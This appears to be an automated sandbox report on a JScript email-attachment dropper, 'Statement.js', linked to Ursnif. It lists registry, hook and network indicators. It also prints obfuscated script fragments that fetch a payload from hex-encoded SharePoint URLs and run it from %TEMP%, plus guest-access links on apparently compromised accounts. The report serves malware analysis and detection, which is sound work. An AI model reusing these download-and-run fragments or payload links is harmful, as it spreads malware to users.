  "goJnUL86e.exe" has type "PE32 executable (console) Intel 80386 for MS Windows"
  "download[1].aspx" has type "PE32 executable (console) Intel 80386 for MS Windows"
  
  source
  
  Extracted File
  
  relevance
  
  10/10
- Opens the MountPointManager (often used to detect additional infection locations)
  
  details
  
  "wscript.exe" opened "MountPointManager"
  
  source
  
  API Call
  
  relevance
  
  5/10
- Touches files in the Windows directory
  
  details
  
  "wscript.exe" touched file "%WINDIR%\System32\en-US\WScript.exe.mui"
  "wscript.exe" touched file "%WINDIR%\System32\WScript.exe"
  "wscript.exe" touched file "%WINDIR%\Globalization\Sorting\sortdefault.nls"
  "wscript.exe" touched file "%WINDIR%\system32\rsaenh.dll"
  "wscript.exe" touched file "%WINDIR%\system32\tzres.dll"
  "wscript.exe" touched file "%WINDIR%\system32\en-US\tzres.dll.mui"
  "wscript.exe" touched file "%WINDIR%\system32\wshom.ocx"
  "wscript.exe" touched file "%WINDIR%\system32\en-US\KERNELBASE.dll.mui"
  "wscript.exe" touched file "%WINDIR%\System32\msxml3r.dll"
  "wscript.exe" touched file "%WINDIR%\System32\msxml3.dll\1"
  "wscript.exe" touched file "%WINDIR%\System32\msxml3.dll"
  "wscript.exe" touched file "%APPDATA%\Microsoft\Windows\Cookies"
  "wscript.exe" touched file "%APPDATA%\Microsoft\Windows\Cookies\index.dat"
  "wscript.exe" touched file "%LOCALAPPDATA%\Microsoft\Windows\History\History.IE5\index.dat"
  "wscript.exe" touched file "%WINDIR%\system32\en-US\urlmon.dll.mui"
  
  source
  
  API Call
  
  relevance
  
  7/10
Network Related
- Found potential URL in binary/memory
  
  details
  
  Heuristic match: "talkuktelecom-my.sharepoint.com"
  
  source
  
  String
  
  relevance
  
  10/10
System Security
- Modifies Software Policy Settings
  
  details
  
  "wscript.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA")
  "wscript.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES")
  "wscript.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLS")
  "wscript.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLS")
  "wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA")
  "wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES")
  "wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLS")
  "wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLS")
  "wscript.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED")
  "wscript.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CERTIFICATES")
  "wscript.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CRLS")
  "wscript.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CTLS")
  "wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED")
  "wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CERTIFICATES")
  "wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CRLS")
  "wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CTLS")
  "wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT")
  "wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES")
  "wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CRLS")
  "wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CTLS")
  
  source
  
  Registry Access
  
  relevance
  
  10/10
- Modifies proxy settings
  
  details
  
  "wscript.exe" (Access type: "SETVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYENABLE"; Value: "00000000")
  "wscript.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYSERVER")
  "wscript.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYOVERRIDE")
  "wscript.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
  "wscript.exe" (Access type: "DELETEVAL"; Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
  
  source
  
  Registry Access
  
  relevance
  
  10/10
- Queries sensitive IE security settings
  
  details
  
  "wscript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SECURITY"; Key: "DISABLESECURITYSETTINGSCHECK")
  
  source
  
  Registry Access
  
  relevance
  
  8/10
Unusual Characteristics
- Drops cabinet archive files
  
  details
  
  "Cab6293.tmp" has type "Microsoft Cabinet archive data 50939 bytes 1 file"
  
  source
  
  Extracted File
  
  relevance
  
  10/10
- Installs hooks/patches the running process
  
  details
  
  "wscript.exe" wrote bytes "7739137779a81777be721777d62d17771de2127705a21777c868167757d11d77bee31277616f1777684115770050157700000000ad3758758b2d5875b641587500000000" to virtual address "0x74CA1000" (part of module "WSHIP6.DLL")
  "wscript.exe" wrote bytes "4053157758581677186a1677653c17770000000000bfb7750000000056ccb775000000007ccab7750000000037683b756a2c1777d62d17770000000020693b750000000029a6b77500000000a48d3b7500000000f70eb77500000000" to virtual address "0x75AE1000" (part of module "NSI.DLL")
  "wscript.exe" wrote bytes "92e6127779a81777be721777d62d17771de2127705a21777bee31277616f1777684115770050157700000000ad3758758b2d5875b641587500000000" to virtual address "0x747D1000" (part of module "WSHTCPIP.DLL")
  
  source
  
  Hook Detection
  
  relevance
  
  10/10
- Reads information about supported languages
  
  details
  
  "wscript.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000409")
  
  source
  
  Registry Access
  
  relevance
  
  3/10
- Submission/internal name is suspicious for an executable
  
  details
  
  Input file type is "js" and the name "Statement.js.bin" contains indicator "statement"
  
  source
  
  Monitored Target
  
  relevance
  
  10/10

File Details

All Details:

Statement.js

Filename: Statement.js
Size: 5KiB (5105 bytes)
Type: script javascript
Description: ASCII text, with very long lines, with CRLF line terminators
Architecture
: WINDOWS
SHA256
: 6c4f609be8ebf14fe84c03bcf92211ebabadd89a3a0a54523576264bf2824800
MD5
: 3e8d6c0116f8e930420b46f863165423
SHA1
: af1cf0b74cec03a8e38e41cc9252749705672906

Resources

Icon

Visualization

Input File (PortEx)

Screenshots

Loading content, please wait...

Hybrid Analysis

Tip: Click an analysed process below to view more details.

Analysed 3 processes in total (System Resource Monitor).

wscript.exe "C:\Statement.js" (PID: 2576)
- goJnUL86e.exe (PID: 2836) 5/64 Hash Seen Before
  - svchost.exe (PID: 3616)

Logged Script Calls	Logged Stdout	Extracted Streams	Memory Dumps
Reduced Monitoring	Network Activityy	Network Error	Multiscan Match

Network Analysis

DNS Requests

Domain

Address

Registrar

Country

talkuktelecom-my.sharepoint.com
OSINT

Associated Artifacts for talkuktelecom-my.sharepoint.com

Whois Field	Value
Address	One Microsoft Way,
City	Redmond
Country	US
Creation Date	Mon, 10 Aug 1998 00:00:00 GMT
Creation Date	Sun, 09 Aug 1998 21:00:00 GMT
DNSSEC	unsigned
Domain Name	SHAREPOINT.COM
EMail	abusecomplaints@markmonitor.com
EMail	domains@microsoft.com
Expiration Date	Wed, 09 Aug 2017 00:00:00 GMT
Expiration Date	Tue, 08 Aug 2017 21:00:00 GMT
name	Domain Administrator
Name Server	NS2.BDM.MICROSOFTONLINE.COM
Organization	Microsoft Corporation
Referral URL	http://www.markmonitor.com
Reigstrar	MarkMonitor, Inc.
State	WA
Status	clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Status	clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Last Update	Fri, 08 Jul 2016 00:00:00 GMT
Last Update	Mon, 17 Apr 2017 04:00:10 GMT
Whois Server	whois.markmonitor.com
Zip Code	98052

13.107.6.151

MarkMonitor, Inc.

United States

Contacted Hosts

IP Address

Port/Protocol

Associated Process

Details

13.107.6.151

Associated Artifacts for 13.107.6.151

Details	Associated URL	Threat Level	Positives	Scan Date	Reference
Associated URL http://cyberneticsystems-my.sharepoint.com/personal/james_cybernetic_co_nz/_layouts/15/guestaccess.aspx?docid=00b4476ee19cf43adb8504e725c75d935&authkey=AZu0auXGHQGsIKmvvPtHq6w Threat Level suspicious Positives 1/65 Scan Date 08/06/2017 23:51:41 Reference -	http://cyberneticsystems-my.sharepoint.com/personal/james_cybernetic_co_nz/_layouts/15/guestaccess.aspx?docid=00b4476ee19cf43adb8504e725c75d935&authkey=AZu0auXGHQGsIKmvvPtHq6w	suspicious	1/65	08/06/2017 23:51:41	-
Associated URL http://cordellandco-my.sharepoint.com/personal/cpackham_cordellandco_co_uk/_layouts/15/guestaccess.aspx?docid=07c59ec44ce4843a8856cee7f74f7cd32&authkey=AYmCq6aQGDFVGz4ye1Gm8Kk Threat Level suspicious Positives 1/65 Scan Date 08/06/2017 22:51:48 Reference -	http://cordellandco-my.sharepoint.com/personal/cpackham_cordellandco_co_uk/_layouts/15/guestaccess.aspx?docid=07c59ec44ce4843a8856cee7f74f7cd32&authkey=AYmCq6aQGDFVGz4ye1Gm8Kk	suspicious	1/65	08/06/2017 22:51:48	-
Associated URL https://vcoss-my.sharepoint.com/personal/sally_thompson_vcoss_org_au/_layouts/15/guestaccess.aspx?docid=09aa2c95722f146d5b5ca0438bfedecbf&authkey=AeQokK-5OhgBtAIlTU-CXRM Threat Level suspicious Positives 1/65 Scan Date 08/06/2017 21:22:57 Reference -	https://vcoss-my.sharepoint.com/personal/sally_thompson_vcoss_org_au/_layouts/15/guestaccess.aspx?docid=09aa2c95722f146d5b5ca0438bfedecbf&authkey=AeQokK-5OhgBtAIlTU-CXRM	suspicious	1/65	08/06/2017 21:22:57	-
Associated URL https://lifestylesolutionsaustltd-my.sharepoint.com/personal/margaret_higgins_lifestylesolutions_org_au/_layouts/15/guestaccess.aspx?docid=0d615ad45ab484afd9b9d35d3f9005bfc&authkey=ARqQT0PO7oUuhlzRuKsR7nQ Threat Level suspicious Positives 1/65 Scan Date 08/06/2017 21:17:38 Reference -	https://lifestylesolutionsaustltd-my.sharepoint.com/personal/margaret_higgins_lifestylesolutions_org_au/_layouts/15/guestaccess.aspx?docid=0d615ad45ab484afd9b9d35d3f9005bfc&authkey=ARqQT0PO7oUuhlzRuKsR7nQ	suspicious	1/65	08/06/2017 21:17:38	-
Associated URL http://prmintacc-my.sharepoint.com/personal/estrella_intacc_com_au/_layouts/15/guestaccess.aspx Threat Level malicious Positives 2/65 Scan Date 08/06/2017 09:11:34 Reference -	http://prmintacc-my.sharepoint.com/personal/estrella_intacc_com_au/_layouts/15/guestaccess.aspx	malicious	2/65	08/06/2017 09:11:34	-

Details	Associated SHA256	Threat Level	Positives	Scan Date	Reference
Associated SHA256 baa641a16b90fae9dd94eadd2e1b722ed16e9d9a41f52a5311515649d29ba4af Threat Level malicious Positives 5/59 Scan Date 08/06/2017 23:39:13 Reference VirusTotal	baa641a16b90fae9dd94eadd2e1b722ed16e9d9a41f52a5311515649d29ba4af	malicious	5/59	08/06/2017 23:39:13	VirusTotal
Associated SHA256 157d703de04271b452a1c824094d9b02254df951eac2aa78f50f22ddba7d5a7c Threat Level malicious Positives 7/58 Scan Date 08/04/2017 16:37:21 Reference VirusTotal	157d703de04271b452a1c824094d9b02254df951eac2aa78f50f22ddba7d5a7c	malicious	7/58	08/04/2017 16:37:21	VirusTotal
Associated SHA256 1b9587fefcc221b5e488cb185eb9492deaeab6c52967833d7ed00388897992a7 Threat Level malicious Positives 5/58 Scan Date 08/03/2017 16:13:26 Reference VirusTotal	1b9587fefcc221b5e488cb185eb9492deaeab6c52967833d7ed00388897992a7	malicious	5/58	08/03/2017 16:13:26	VirusTotal
Associated SHA256 4f3fd103c5eaaef7c80dc280ec8d25ad16bac67f0f9ddb953384b7e439e0938d Threat Level malicious Positives 10/59 Scan Date 08/03/2017 07:42:27 Reference VirusTotal	4f3fd103c5eaaef7c80dc280ec8d25ad16bac67f0f9ddb953384b7e439e0938d	malicious	10/59	08/03/2017 07:42:27	VirusTotal
Associated SHA256 7ab0ee51d34598d5f376f7e4ac3ab0ae985923c6c506292c7b5e7194b68a5d1d Threat Level malicious Positives 13/58 Scan Date 08/03/2017 02:01:11 Reference VirusTotal	7ab0ee51d34598d5f376f7e4ac3ab0ae985923c6c506292c7b5e7194b68a5d1d	malicious	13/58	08/03/2017 02:01:11	VirusTotal

Details	Domain	Threat Level	Positives	Last Resolved	Reference
Domain 14westit-my.sharepoint.com Threat Level - Positives - Last Resolved 08/03/2017 00:00:00 VirusTotal Report	14westit-my.sharepoint.com	-	-	08/03/2017 00:00:00	Report
Domain 365mango.sharepoint.com Threat Level - Positives - Last Resolved 08/02/2017 00:00:00 VirusTotal Report	365mango.sharepoint.com	-	-	08/02/2017 00:00:00	Report
Domain agravmedia-my.sharepoint.com Threat Level - Positives - Last Resolved 08/02/2017 00:00:00 VirusTotal Report	agravmedia-my.sharepoint.com	-	-	08/02/2017 00:00:00	Report
Domain 1300tempfence-my.sharepoint.com Threat Level - Positives - Last Resolved 07/27/2017 00:00:00 VirusTotal Report	1300tempfence-my.sharepoint.com	-	-	07/27/2017 00:00:00	Report
Domain accordhealthcare.sharepoint.com Threat Level - Positives - Last Resolved 07/23/2017 00:00:00 VirusTotal Report	accordhealthcare.sharepoint.com	-	-	07/23/2017 00:00:00	Report

TCP

wscript.exe
PID: 2576

United States

178.33.188.154

TCP

svchost.exe
PID: 3616

France

Contacted Countries

HTTP Traffic

No relevant HTTP requests were made.

Suricata Alerts

Event	Category	Description	SID
178.33.188.154 -> local:61838 (TCP)	A Network Trojan was detected	ETPRO TROJAN Malicious SSL certificate detected (Ursnif Injects)	2822166
178.33.188.154 -> local:61835 (TCP)	A Network Trojan was detected	ETPRO TROJAN Malicious SSL certificate detected (Ursnif Injects)	2822166

ET rules applied using Suricata. Find out more about proofpoint ET Intelligence here.

Extracted Strings

Download All Memory Strings (2.5KiB)

!This program cannot be run in DOS mode.$

Ansi based on Dropped File (download[1].aspx.2515276793)

"C:\Statement.js"

Ansi based on Process Commandline (wscript.exe)

%08X-%04X-%04X-%04X-%08X%04X

Unicode based on Hybrid Analysis (goJnUL86e.exe , 00042481-00002836.00000002.48973.01001000.00000020.mdmp)

%systemroot%\system32\svchost.exe

Unicode based on Hybrid Analysis (goJnUL86e.exe , 00042481-00002836.00000002.48973.01001000.00000020.mdmp)

%windir%\tracing

Unicode based on Runtime Data (wscript.exe )

*.dll

Unicode based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.0100A000.00000004.mdmp)

++iagCPv;if (iagCPv==CXspSP02.length) iagCPv=(((0x103000>>0xc)*(8073834705028118528/8073834705028118528)+(1333788672>>>23))%(~-2));WjsincMu04mn['73656E64'.tr()]();

Ansi based on Hybrid Analysis (Statement.js.bin)

.idata

Ansi based on Dropped File (download[1].aspx.2515276793)

.reloc

Ansi based on Dropped File (download[1].aspx.2515276793)

76b0d0

Unicode based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.0100A000.00000004.mdmp)

8576b0d0

Unicode based on Hybrid Analysis (goJnUL86e.exe , 00042481-00002836.00000002.48973.01001000.00000020.mdmp)

:%uattrib -h -r -s %%1del %%1if exist %%1 goto %udel %%0

Ansi based on Hybrid Analysis (goJnUL86e.exe , 00042481-00002836.00000002.48973.01001000.00000020.mdmp)

;%n0'

Ansi based on Dropped File (download[1].aspx.2515276793)

?______J

Ansi based on Image Processing (screen_0.png)

\\.\pipe\

Unicode based on Hybrid Analysis (goJnUL86e.exe , 00042481-00002836.00000002.48973.01001000.00000020.mdmp)

\KnownDlls\ntdll.dll

Unicode based on Hybrid Analysis (goJnUL86e.exe , 00042481-00002836.00000002.48973.01001000.00000020.mdmp)

\Microsoft\Windows\

Unicode based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.0100A000.00000004.mdmp)

\Modules32

Unicode based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.0100A000.00000004.mdmp)

\REGISTRY\USER\%s\%s\

Unicode based on Hybrid Analysis (goJnUL86e.exe , 00042481-00002836.00000002.48973.01001000.00000020.mdmp)

\RPC Control\console-0x00000640-lpc-handle

Unicode based on Runtime Data (goJnUL86e.exe )

\Sessions\1\Windows\ApiPort

Unicode based on Runtime Data (goJnUL86e.exe )

\Software\Microsoft\Windows\CurrentVersion\Run

Unicode based on Hybrid Analysis (goJnUL86e.exe , 00042481-00002836.00000002.48973.01001000.00000020.mdmp)

\system32\user32.dll

Ansi based on Dropped File (download[1].aspx.2515276793)

_-,?'

Ansi based on Image Processing (screen_0.png)

____,,

Ansi based on Image Processing (screen_0.png)

_allmul

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

_aulldiv

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

_m_m,,,

Ansi based on Image Processing (screen_0.png)

_pAyLoAD

Ansi based on Image Processing (screen_0.png)

_r?m?_?_?_J?_?___q_?__,m__??_mun??__?_v____,_,_

Ansi based on Image Processing (screen_0.png)

_snprintf

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

_snwprintf

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

_strupr

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

_wcsupr

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

`$D}e

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.0100A000.00000004.mdmp)

`.adata

Ansi based on Dropped File (download[1].aspx.2515276793)

`.data

Ansi based on Dropped File (download[1].aspx.2515276793)

`\??\Volume{8177f4e4-b53f-11e4-a9c2-806e6f6e6963}

Unicode based on Runtime Data (wscript.exe )

`\??\Volume{8177f4e5-b53f-11e4-a9c2-806e6f6e6963}

Unicode based on Runtime Data (wscript.exe )

ADVAPI32.dll

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

AuthenticodeEnabled

Unicode based on Runtime Data (goJnUL86e.exe )

AutoConfigURL

Unicode based on Runtime Data (wscript.exe )

AutoDetect

Unicode based on Runtime Data (wscript.exe )

bTdeP18rrN=-1+bTdeP18rrN}

Ansi based on Hybrid Analysis (Statement.js.bin)

catch(FDCBEIK){}

Ansi based on Hybrid Analysis (Statement.js.bin)

ChooseColorW

Ansi based on Dropped File (download[1].aspx.2515276793)

CloseHandle

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

CoFreeLibrary

Ansi based on Dropped File (download[1].aspx.2515276793)

CoInternetCreateZoneManager

Ansi based on Dropped File (download[1].aspx.2515276793)

COMDLG32.dll

Ansi based on Dropped File (download[1].aspx.2515276793)

ConsoleTracingMask

Unicode based on Runtime Data (wscript.exe )

CreateEventA

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

CreateEventW

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

CreateFileMappingW

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

CreateFileW

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

CreateProcessW

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

CryptSvc

Unicode based on Runtime Data (wscript.exe )

cryptsvc

Unicode based on Runtime Data (wscript.exe )

CWDIllegalInDLLSearch

Unicode based on Runtime Data (goJnUL86e.exe )

CXspSP02=['6874bdJp74nfm70733Aaww2F2F7461kXu6CS dOlm6BpnksksgZMyymlw75 svwblcuyr6B74 qPa65knHgSoluphdo6C6563hlpavfV6F6D2DJefo iar6Dx rypa792E73su eofbegRqaMd68pexzz61Xym7265nRuP Livt70XarvzvkssJcj6Fc uprpb iN txq69ewOyXSvyWbmfu6E742Ehuy63Qia6F6DfNfV2FV bsc7065wkySf72uvnia73nqYl6FwLUeHj6E616Coc 2F73hwJiTbyxnxk6176geWwvlwavcs5Fkrtj 74eI c616CjtoahxnX6B756Bdvxbug74656C65o fUjrxd636F6Dhwyt5F63d w6F5FaVioW756Bhulge2Fntvw5F wH6CxMk 61mopjiuci796Fuigncsbq757473Vrwccpi2FhYQ31352F67wxb75657374gK OqlQqwxszscWt61bns63Gudxylf63 te6573732EYmcv6173brxukwywvl70jfbpiPlx 783FK c646F6369cdpyhakf643D30mppi35nyeld3136wpv336566viwX6363bjyd34bp ww656164x 346430gejIjdbz36ewgajrth6234VcZ39333265t qnei32UxZgt3932bds c6130Hwp Nyf dJwjZT34yfLgvIfkyOgfsykyJ gssjnjeyoctnKwt61j L38 Noge6238tGRkh2661lef xkxbq Qv7574686Bmlv65PvTTGfiT793D41 gp53wbkG5374ReHyhc39576Ao dl o 642Dqtm6A63465Af ywdxTZ5F4751 jcdx hyfnp4F4FMpoa6Awyw3330ddKeUp7155'.tr(),'6874747073mhhIvqr Xqk3A2F2F73Tygghhalkiw74616EoJanb6472Rund ex657773nmtRjpxm 72NkM 69616CPcvvfHtXzpUqyfvgajqotsRya ovb Pw74zxhstu6F2DvQNgvbewbpe ersm6D792EHo llpmoHkuLzHikIjNwuW73gpe6861bejf726570rbL6F69brl6EbSip742E63 wyp6F6Df j2F706572vm uv73PjygprU6F6E61HosjwqlTwqppefwgmfsRV6Chcyvn2F72Hiavhm69yiW616C746FyYjy63puWypajb657072uqpefbnqz6F6A65qLoKrsunjHcw63m p745Fk r 7374cPnaw616E64php726577xzWwVxPbq uopcrjkm737269Qp 616C746FOddX Zsdnyc5FgIq69652Fgsyusu 5Fgxfws6C6179rcvv6FwprsrRv75Opkl74732Fabmde31aezjjhx35trzH2FOpjx67ryminmbf7565upy73746163Xj aebH63HmeNvN657373jwk2E6173qzeg70munevtipZZzw783Fxrrhlu xu ap646F6369mo Y643D jO306638ud cjX65tlyyw66wvtr 3032Oibu66zOluohs636537NnUar3162I KsHeabiurU3436ifX313961jktogiwcU6163kbNesjd3237rr 33ccy3338jLl376134ekn36663565zlajhlIwddb jx38vMf2661dolO75cfsvoypoRkw7468 qa6B65giQHh79MjqzqKexswnU3D41rvp666839hVZg71uQfcokpv2D33UGz3153xvjx 4B6CpWxjmejfj50Zhck76m o x76jNnaSk uT63 jofp74mqvtlcky585932dQamZp79454A45'.tr()];Iw7NDHE3h6L=new QxgoLa8eWQJs('57536372697074alblO2E53kdxZbgTefWuotS6865yhhesxup6Cxrt6C'.tr());xxNIVi='52756E'.tr();kjiamnwS01pn=Iw7NDHE3h6L[X50wIu]('2554454D50oYxJ aLb25iuvS2F67idadktPrj6F4A e nIlGb6E55dqdb x4C3836dad652E65uunj78UYp65'.tr());

Ansi based on Hybrid Analysis (Statement.js.bin)

DebugHeapFlags

Unicode based on Runtime Data (goJnUL86e.exe )

DefaultConnectionSettings

Unicode based on Runtime Data (wscript.exe )

DevicePath

Unicode based on Runtime Data (goJnUL86e.exe )

dfdfdf

Ansi based on Dropped File (download[1].aspx.2515276793)

dfdfdfdf

Ansi based on Dropped File (download[1].aspx.2515276793)

Disable

Unicode based on Runtime Data (goJnUL86e.exe )

DisableEngine

Unicode based on Runtime Data (goJnUL86e.exe )

DisableImprovedZoneCheck

Unicode based on Runtime Data (goJnUL86e.exe )

DisableLocalOverride

Unicode based on Runtime Data (goJnUL86e.exe )

DisableMetaFiles

Unicode based on Runtime Data (goJnUL86e.exe )

DisableUserModeCallbackFilter

Unicode based on Runtime Data (goJnUL86e.exe )

DsFreeSchemaGuidMapA

Ansi based on Dropped File (download[1].aspx.2515276793)

DsFreeSpnArrayW

Ansi based on Dropped File (download[1].aspx.2515276793)

en-US

Unicode based on Runtime Data (wscript.exe )

EnableConsoleTracing

Unicode based on Runtime Data (wscript.exe )

EnableFileTracing

Unicode based on Runtime Data (wscript.exe )

EnterCriticalSection

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

eoECJZjuESk=WjsincMu04mn['73746174iihgqfa75nnm7354maxM6578eihbvqq sIwYeYob74'.tr()];if (eoECJZjuESk&&eoECJZjuESk=='4F4B'.tr()) cTcPk16=((~(~0x4000))>>(14<<32));}

Ansi based on Hybrid Analysis (Statement.js.bin)

ExitProcess

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

ExpandEnvironmentStringsW

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

FileDirectory

Unicode based on Runtime Data (wscript.exe )

FileTracingMask

Unicode based on Runtime Data (wscript.exe )

FindNextVolumeMountPointA

Ansi based on Dropped File (download[1].aspx.2515276793)

FindTextW

Ansi based on Dropped File (download[1].aspx.2515276793)

function String.prototype.tr(){

Ansi based on Hybrid Analysis (Statement.js.bin)

function tick(str){var B5JZP8QBG=((~(-116*0x1-0x57))%(0x100000>>0x14));var qvHyZw1J76aT="";var qDhA9qv=String.fromCharCode(str);for(wdsk9Zxz=0;wdsk9Zxz<100;wdsk9Zxz++){B5JZP8QBG=B5JZP8QBG+1;};return qDhA9qv;}

Ansi based on Hybrid Analysis (Statement.js.bin)

GetBinaryTypeA

Ansi based on Dropped File (download[1].aspx.2515276793)

GetCurrentProcessId

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

GetCurrentThreadId

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

GetLastError

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

GetModuleFileNameW

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

GetModuleHandleA

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

GetProcAddress

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

GetShellWindow

Ansi based on Hybrid Analysis (goJnUL86e.exe , 00042481-00002836.00000002.48973.01001000.00000020.mdmp)

GetSystemTimeAsFileTime

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

GetTempFileNameW

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

GetTempPathW

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

GetWindowsDirectoryA

Ansi based on Dropped File (download[1].aspx.2515276793)

GetWindowThreadProcessId

Ansi based on Hybrid Analysis (goJnUL86e.exe , 00042481-00002836.00000002.48973.01001000.00000020.mdmp)

GlobalSize

Ansi based on Dropped File (download[1].aspx.2515276793)

gpsvc

Unicode based on Runtime Data (wscript.exe )

HeapAlloc

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

HeapCreate

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

HeapDestroy

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

HeapFree

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.01009000.00000002.mdmp)

hreadProcessId

Ansi based on Memory/File Scan (goJnUL86e.exe , 00042481-00002836.00000002.48973.0100A000.00000004.mdmp)

IETldDllVersionHigh

